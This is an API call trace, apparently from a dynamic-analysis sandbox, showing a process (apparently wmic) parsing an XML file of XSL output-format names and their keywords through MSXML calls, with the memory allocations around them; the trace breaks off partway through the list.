[0562.927] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1fd71d0, DOMElement=0xaf5d0 | out: DOMElement=0xaf5d0*=0x1fdbc50) returned 0x0
[0562.927] malloc (_Size=0x18) returned 0x189000
[0562.927] IXMLDOMElement:getElementsByTagName (in: This=0x1fdbc50, tagName="XSLFORMAT", resultList=0xaf5e0 | out: resultList=0xaf5e0*=0x1fd9cc0) returned 0x0
[0562.930] free (_Block=0x189000)
[0562.930] IXMLDOMNodeList:get_length (in: This=0x1fd9cc0, listLength=0xaf7a8 | out: listLength=0xaf7a8*=21) returned 0x0
[0562.930] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=0, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.931] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.931] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.931] malloc (_Size=0x18) returned 0x189000
[0562.931] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.931] free (_Block=0x189000)
[0562.931] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x80070001c)) returned 0x0
[0562.931] malloc (_Size=0x18) returned 0x189000
[0562.932] malloc (_Size=0x18) returned 0x189020
[0562.932] malloc (_Size=0x30) returned 0x1880c0
[0562.932] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.932] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.932] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.932] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=1, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.932] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.932] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.932] malloc (_Size=0x18) returned 0x189060
[0562.933] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.933] free (_Block=0x189060)
[0562.933] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x80070001c)) returned 0x0
[0562.933] malloc (_Size=0x18) returned 0x189060
[0562.933] malloc (_Size=0x18) returned 0x189080
[0562.934] SysStringLen (param_1="VALUE") returned 0x5
[0562.934] SysStringLen (param_1="TABLE") returned 0x5
[0562.934] SysStringLen (param_1="TABLE") returned 0x5
[0562.934] SysStringLen (param_1="VALUE") returned 0x5
[0562.934] malloc (_Size=0x30) returned 0x188100
[0562.934] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.934] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.934] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.934] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=2, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.934] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.934] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.934] malloc (_Size=0x18) returned 0x1890a0
[0562.934] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.935] free (_Block=0x1890a0)
[0562.935] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x80070001c)) returned 0x0
[0562.935] malloc (_Size=0x18) returned 0x1890a0
[0562.935] malloc (_Size=0x18) returned 0x1890c0
[0562.935] SysStringLen (param_1="LIST") returned 0x4
[0562.935] SysStringLen (param_1="TABLE") returned 0x5
[0562.935] malloc (_Size=0x30) returned 0x188140
[0562.935] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.935] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.935] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.935] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=3, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.935] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="rawxml.xsl") returned 0x0
[0562.936] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.936] malloc (_Size=0x18) returned 0x1890e0
[0562.936] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.936] free (_Block=0x1890e0)
[0562.936] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x80070001c)) returned 0x0
[0562.936] malloc (_Size=0x18) returned 0x1890e0
[0562.936] malloc (_Size=0x18) returned 0x189100
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] SysStringLen (param_1="TABLE") returned 0x5
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] SysStringLen (param_1="LIST") returned 0x4
[0562.936] SysStringLen (param_1="LIST") returned 0x4
[0562.936] SysStringLen (param_1="RAWXML") returned 0x6
[0562.936] malloc (_Size=0x30) returned 0x188180
[0562.937] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.937] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.937] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.937] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=4, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.937] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.937] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.937] malloc (_Size=0x18) returned 0x189120
[0562.937] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.937] free (_Block=0x189120)
[0562.937] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x80070001c)) returned 0x0
[0562.937] malloc (_Size=0x18) returned 0x189120
[0562.938] malloc (_Size=0x18) returned 0x189140
[0562.938] SysStringLen (param_1="HTABLE") returned 0x6
[0562.938] SysStringLen (param_1="TABLE") returned 0x5
[0562.938] SysStringLen (param_1="HTABLE") returned 0x6
[0562.938] SysStringLen (param_1="LIST") returned 0x4
[0562.938] malloc (_Size=0x30) returned 0x1881c0
[0562.938] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.938] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.938] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.938] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=5, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.938] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="hform.xsl") returned 0x0
[0562.938] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.938] malloc (_Size=0x18) returned 0x189160
[0562.939] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.939] free (_Block=0x189160)
[0562.939] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x80070001c)) returned 0x0
[0562.939] malloc (_Size=0x18) returned 0x189160
[0562.939] malloc (_Size=0x18) returned 0x189180
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="TABLE") returned 0x5
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="LIST") returned 0x4
[0562.939] SysStringLen (param_1="HFORM") returned 0x5
[0562.939] SysStringLen (param_1="HTABLE") returned 0x6
[0562.939] malloc (_Size=0x30) returned 0x188200
[0562.940] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.940] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.940] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.940] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=6, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.940] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="xml.xsl") returned 0x0
[0562.940] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.940] malloc (_Size=0x18) returned 0x1891a0
[0562.940] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.940] free (_Block=0x1891a0)
[0562.940] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x80070001c)) returned 0x0
[0562.940] malloc (_Size=0x18) returned 0x1891a0
[0562.940] malloc (_Size=0x18) returned 0x1891c0
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] SysStringLen (param_1="TABLE") returned 0x5
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] SysStringLen (param_1="VALUE") returned 0x5
[0562.941] SysStringLen (param_1="VALUE") returned 0x5
[0562.941] SysStringLen (param_1="XML") returned 0x3
[0562.941] malloc (_Size=0x30) returned 0x188240
[0562.941] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.941] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.941] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.941] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=7, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.941] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.941] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.941] malloc (_Size=0x18) returned 0x1891e0
[0562.942] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.942] free (_Block=0x1891e0)
[0562.942] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x80070001c)) returned 0x0
[0562.942] malloc (_Size=0x18) returned 0x1891e0
[0562.942] malloc (_Size=0x18) returned 0x189200
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="TABLE") returned 0x5
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="LIST") returned 0x4
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] SysStringLen (param_1="RAWXML") returned 0x6
[0562.942] SysStringLen (param_1="LIST") returned 0x4
[0562.942] SysStringLen (param_1="MOF") returned 0x3
[0562.942] malloc (_Size=0x30) returned 0x188280
[0562.943] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.943] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.943] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.943] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=8, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.943] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="csv.xsl") returned 0x0
[0562.943] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.943] malloc (_Size=0x18) returned 0x189220
[0562.943] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.943] free (_Block=0x189220)
[0562.943] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x80070001c)) returned 0x0
[0562.943] malloc (_Size=0x18) returned 0x189220
[0562.943] malloc (_Size=0x18) returned 0x189240
[0562.943] SysStringLen (param_1="CSV") returned 0x3
[0562.943] SysStringLen (param_1="TABLE") returned 0x5
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="LIST") returned 0x4
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="HTABLE") returned 0x6
[0562.944] SysStringLen (param_1="CSV") returned 0x3
[0562.944] SysStringLen (param_1="HFORM") returned 0x5
[0562.944] malloc (_Size=0x30) returned 0x1882c0
[0562.944] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.944] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.944] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.944] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=9, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.944] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.944] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.944] malloc (_Size=0x18) returned 0x189260
[0562.944] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.945] free (_Block=0x189260)
[0562.945] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x80070001c)) returned 0x0
[0562.945] malloc (_Size=0x18) returned 0x189260
[0562.945] malloc (_Size=0x18) returned 0x189280
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="TABLE") returned 0x5
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="VALUE") returned 0x5
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] SysStringLen (param_1="XML") returned 0x3
[0562.945] SysStringLen (param_1="XML") returned 0x3
[0562.945] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.945] malloc (_Size=0x30) returned 0x188300
[0562.945] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.945] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.946] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.946] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=10, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.946] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.946] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.946] malloc (_Size=0x18) returned 0x1892a0
[0562.946] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.946] free (_Block=0x1892a0)
[0562.946] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x80070001c)) returned 0x0
[0562.946] malloc (_Size=0x18) returned 0x1892a0
[0562.946] malloc (_Size=0x18) returned 0x1892c0
[0562.946] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="TABLE") returned 0x5
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="XML") returned 0x3
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.947] SysStringLen (param_1="XML") returned 0x3
[0562.947] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.947] malloc (_Size=0x30) returned 0x188340
[0562.947] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.947] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.947] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.947] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=11, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.947] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.947] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.948] malloc (_Size=0x18) returned 0x1892e0
[0562.948] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.948] free (_Block=0x1892e0)
[0562.948] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.948] malloc (_Size=0x18) returned 0x1892e0
[0562.948] malloc (_Size=0x18) returned 0x189300
[0562.948] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="TABLE") returned 0x5
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="XML") returned 0x3
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.949] malloc (_Size=0x30) returned 0x188380
[0562.949] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.949] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.949] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.949] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=12, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.949] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.949] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.949] malloc (_Size=0x18) returned 0x189320
[0562.950] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.950] free (_Block=0x189320)
[0562.950] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x80070001c)) returned 0x0
[0562.950] malloc (_Size=0x18) returned 0x189320
[0562.950] malloc (_Size=0x18) returned 0x189340
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="TABLE") returned 0x5
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="XML") returned 0x3
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.950] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.950] malloc (_Size=0x30) returned 0x1883c0
[0562.951] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.951] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.951] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.951] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=13, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.951] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.951] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.951] malloc (_Size=0x18) returned 0x189360
[0562.951] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.951] free (_Block=0x189360)
[0562.951] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x80070001c)) returned 0x0
[0562.951] malloc (_Size=0x18) returned 0x189360
[0562.952] malloc (_Size=0x18) returned 0x189380
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="TABLE") returned 0x5
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="XML") returned 0x3
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.952] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.952] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.952] malloc (_Size=0x30) returned 0x188400
[0562.952] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.952] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.952] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.952] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=14, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.953] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="texttable.xsl") returned 0x0
[0562.953] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.953] malloc (_Size=0x18) returned 0x1893a0
[0562.953] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.953] free (_Block=0x1893a0)
[0562.953] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x80070001c)) returned 0x0
[0562.953] malloc (_Size=0x18) returned 0x1893a0
[0562.953] malloc (_Size=0x18) returned 0x1893c0
[0562.953] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.953] SysStringLen (param_1="TABLE") returned 0x5
[0562.953] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="XML") returned 0x3
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.954] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.954] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0562.954] malloc (_Size=0x30) returned 0x188440
[0562.954] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.954] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.954] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.954] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=15, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.954] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.954] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.954] malloc (_Size=0x18) returned 0x1893e0
[0562.955] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.955] free (_Block=0x1893e0)
[0562.955] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x80070001c)) returned 0x0
[0562.955] malloc (_Size=0x18) returned 0x1893e0
[0562.955] malloc (_Size=0x18) returned 0x189400
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="TABLE") returned 0x5
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="XML") returned 0x3
[0562.955] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.955] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.956] SysStringLen (param_1="XML") returned 0x3
[0562.956] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.956] malloc (_Size=0x30) returned 0x188480
[0562.956] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.956] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.956] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.956] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=16, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.956] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="htable.xsl") returned 0x0
[0562.956] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.956] malloc (_Size=0x18) returned 0x189420
